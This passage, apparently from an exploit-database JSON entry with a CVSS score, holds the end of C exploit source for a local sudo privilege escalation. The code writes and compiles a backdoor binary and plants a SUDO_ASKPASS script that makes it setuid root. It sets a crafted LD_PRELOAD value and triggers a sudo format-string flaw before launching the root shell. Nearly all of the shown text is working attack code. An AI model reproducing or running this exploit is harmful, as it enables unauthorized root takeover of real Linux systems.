);\n returnval = -1;\n }else{\n printf(\"[+] Writing backdoor: %s\\n\", BACKDOOR);\n }\n\n fwrite(bdcode, 1, sizeof(bdcode)-1, fp); fclose(fp);\n memset(compile_bd, 0x00, sizeof(compile_bd));\n snprintf(compile_bd, sizeof(BACKDOOR)+sizeof(BD_COMPILED)+17,\"/usr/bin/gcc %s -o %s\", BACKDOOR, BD_COMPILED);\n printf(\"[+] Compiling backdoor: %s\\n\", BD_COMPILED);\n fp = popen(compile_bd, \"r\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to compile the backdoor, check the gcc path\\n\" );\n returnval = -1;\n }\n\n fclose(fp);\n memset(askpass, 0x00, sizeof(askpass));\n snprintf(askpass, sizeof(BD_COMPILED)*2+39,\"#!/bin/sh\\nchown root:root %s\\nchmod 4777 %s\\n\", BD_COMPILED, BD_COMPILED);\n fp = fopen(SUDO_ASKPASS,\"w\");\n\n if (fp == NULL) {\n printf(\"[-] Failed to write backdoor on the target, check your permissions\\n\" );\n returnval = -1;\n }else{\n printf(\"[+] Writing SUDO_ASKPASS file: %s\\n\", SUDO_ASKPASS);\n }\n\n fwrite(askpass, 1, sizeof(askpass)-1, fp); fclose(fp);\n chmod(SUDO_ASKPASS, 0755);\n return returnval;\n};\n\nvoid *set_env(){\n int i = 0;\n char ld_preload_evar[OFFSET] = \"LD_PRELOAD=\";\n char user_details[OFFSET] = {0x1f, 0x46, 0x01, 0x40};\n char sudo_askpass_evar[40];\n for (i=0; i<(OFFSET/4); i++){\n memcpy(user_details+(i*4), user_details, sizeof(int));\n }\n\n memmove (ld_preload_evar+11, user_details , sizeof(user_details));\n memset(sudo_askpass_evar, 0x00, sizeof(sudo_askpass_evar));\n snprintf(sudo_askpass_evar, sizeof(SUDO_ASKPASS)+13,\"SUDO_ASKPASS=%s\", SUDO_ASKPASS);\n\n // set our environment\n putenv(ld_preload_evar);\n putenv(sudo_askpass_evar);\n};\n\nvoid *kill_sudo(){\n char fmtstring[] = \"%20$08n %*482$ %*2850$ %1073741824$\";\n char *args[] = { fmtstring, \"-D9\", \"-A\", \"\", NULL};\n\n // trigger the vuln\n execve(sudo, args, environ);\n};\n\nvoid *pop_shell(){\n // set our environment\n unsetenv(\"LD_PRELOAD\");\n unsetenv(\"SUDO_ASKPASS\");\n char *exploit_args[] = { BD_COMPILED, NULL };\n execve(BD_COMPILED, exploit_args, environ);\n};", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}]}
